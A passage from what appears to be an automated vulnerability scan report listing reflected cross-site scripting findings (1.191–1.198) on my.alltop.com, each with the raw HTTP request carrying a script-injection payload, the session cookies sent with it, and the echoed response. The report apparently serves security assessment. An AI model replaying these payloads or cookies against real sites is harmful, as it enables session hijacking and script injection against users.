Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:06 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:06 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p'%22--%3E%3C5e681"><script>alert(1)</script>41158ba707c/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.191. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65068"><script>alert(1)</script>942fd3f40ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p'%22--%3E%3C/style%3E%3C65068"><script>alert(1)</script>942fd3f40ac/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:08 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p'%22--%3E%3C/style%3E%3C65068"><script>alert(1)</script>942fd3f40ac/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.192. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e3b1"><script>alert(1)</script>00c095fb0f4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C1e3b1"><script>alert(1)</script>00c095fb0f4/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C1e3b1"><script>alert(1)</script>00c095fb0f4/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.193. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb612"><script>alert(1)</script>76cc28d114 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3Efb612"><script>alert(1)</script>76cc28d114 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:14 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3Efb612"><script>alert(1)</script>76cc28d114" method="post" accept-charset="utf-8">
...[SNIP]...

1.194. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc52e"><script>alert(1)</script>108b51fe189 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E?dc52e"><script>alert(1)</script>108b51fe189=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:04 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:04 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:04 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E?dc52e"><script>alert(1)</script>108b51fe189=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.195. http://my.alltop.com/alpha/p/%22ns=%22netsparker(0x0001EE) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p/%22ns=%22netsparker(0x0001EE)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1a9"><script>alert(1)</script>9cded373049 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p9f1a9"><script>alert(1)</script>9cded373049/%22ns=%22netsparker(0x0001EE) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:15 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:15 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p9f1a9"><script>alert(1)</script>9cded373049/%22ns=%22netsparker(0x0001EE)" method="post" accept-charset="utf-8">
...[SNIP]...

1.196. http://my.alltop.com/alpha/p/%22ns=%22netsparker(0x0001EE) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p/%22ns=%22netsparker(0x0001EE)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23248"><script>alert(1)</script>0895e4eb460 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p/%22ns23248"><script>alert(1)</script>0895e4eb460=%22netsparker(0x0001EE) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:16 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p/%22ns23248"><script>alert(1)</script>0895e4eb460=%22netsparker(0x0001EE)" method="post" accept-charset="utf-8">
...[SNIP]...

1.197. http://my.alltop.com/alpha/p/%22ns=%22netsparker(0x0001EE) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p/%22ns=%22netsparker(0x0001EE)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b2b2"><script>alert(1)</script>e7c4c41d0bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p/%22ns=%22netsparker(0x0001EE)?8b2b2"><script>alert(1)</script>e7c4c41d0bd=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p/%22ns=%22netsparker(0x0001EE)?8b2b2"><script>alert(1)</script>e7c4c41d0bd=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.198. http://my.alltop.com/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)

Issue detail

